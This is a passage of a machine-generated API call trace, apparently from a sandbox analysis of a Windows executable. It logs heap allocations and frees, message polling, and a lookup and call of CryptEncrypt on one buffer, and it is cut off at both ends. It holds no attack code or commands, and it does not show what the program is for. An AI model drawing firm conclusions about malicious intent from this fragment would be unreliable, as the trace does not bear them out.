0x2e51580 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2e92798 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e92798 | out: hHeap=0x970000) returned 1 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0237.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0237.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0237.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51340 [0237.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.319] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f4e0 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0237.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0237.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0237.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0237.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0237.320] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x1245c, dwBufLen=0x12460 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x12460) returned 1 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0237.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0237.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0237.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.325] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0237.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0237.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0237.326] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0237.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0237.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.327] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0237.328] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0237.328] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0237.328] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0237.328] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0237.328] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.328] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.328] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.328] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.328] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0237.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.329] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 